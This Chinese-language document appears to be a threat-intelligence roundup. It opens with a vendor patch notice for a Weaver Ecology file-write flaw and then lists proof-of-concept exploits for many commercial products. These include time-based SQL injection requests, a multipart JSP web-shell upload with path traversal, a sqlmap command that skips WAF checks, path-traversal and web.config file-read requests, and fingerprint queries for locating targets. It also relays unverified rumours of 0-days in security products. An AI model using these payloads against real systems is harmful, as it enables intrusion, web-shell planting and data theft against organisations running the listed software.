【泛微一级安全通知】关于Ecology任意文件写入（RCE）漏洞的修复通知
（注意：如部署有测试环境，测试环境也记得更新安全补丁包！）

泛微如下产品功能受以上漏洞影响：
1、Ecology8.0（必须升级到10.65版本安全补丁包）
2、Ecology9.0（目前安全补丁包低于V10.62版本需要手工尽快升级）

升级方法：
方法1：等待安全包自动更新；
方法2：用sysadmin登录oa系统，访问/security/monitor/Monitor.jsp，点击【环境信息】，如果看到【下载并应用更新】，可以直接点击，然后等待几分钟后即可实现在线更新，该更新不需要重启服务。
方法3：手工停止服务打包。

以上漏洞涉及的安全补丁包可在下方页面中点击下载：

https://www.weaver.com.cn/cs/security/edm20240719_kdielfrovkewpiiuyrtewtw.html

另外目前网传情报，无官方披露通报和poc

某edr设备(信息源自abc123，可信度较高)
奇安信天擎V10服务端
深信服某设备

全是聊天记录类型的“存在漏洞”，真假自行判断

华磊科技物流-modifyInsurance-delay-pg-sql注入漏洞

body="l_c_bar"||body="l_c_center"

GET /modifyInsurance.htm?documentCode=-1&insuranceValue=-1&customerId=-1+and+1=(select+1+from+pg_sleep(6)) HTTP/1.1
Host:
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0

https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6

1Panel SQL 注入致远程命令执行漏洞

亿赛通数据泄露防护(DLP)系统NetSecConfigAjax SQL注入漏洞

POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host: xxx.xxx
Content-Type: application/x-www-form-urlencoded

command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--

福建科立讯那个是老day不是0，别传了

https://blog.csdn.net/qq_41904294/article/details/138583047

润乾报表dataSphereServlet接口存在任意文件上传漏洞

body="润乾报表" || body="/raqsoft"

POST /servlet/dataSphereServlet?action=38 HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 397
Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9

--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="openGrpxFile"; filename="539634.jsp"
Content-Type: text/plain

<% out.println("123456"); %>
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="path"

../../../
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="saveServer"

1
--eac629ee4641cb0fe10596fba5e0c5d9--

上传后路径:网站根目录

启明星辰 天玥网络安全审计系统 SQL注入漏洞

python sqlmap.py -u "https://ip/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" --skip-waf --random-agent --dbs --batch --force-ssl

蓝凌EKPsys_ui_component远程命令执行漏洞

POST /sys/ui/sys_ui_component/sysUiComponent.doHTTP/1.1
Host: Accept:application/json,text/javanoscript,*/*;q=0.01
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
Connection:close
Content-Length:401
Content-Type:multipart/form-data;
boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
Origin:http://www.baidu.com
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36X-Requested-With:XMLHttpRequest

------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="method"
replaceExtend

------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="extendId"
../../../../resource/help/km/review/

------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="folderName"
../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51

赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞

GET /BaseModule/ReportManage/DownloadBuilder?filename=/../web.config HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close

数字通指尖云平台-智慧政务OA PayslipUser SQL注入漏洞

GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=%28SELECT+4655+FROM+%28SELECT%28SLEEP%285%29%29%29usQE%29 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*Connection: keep-alive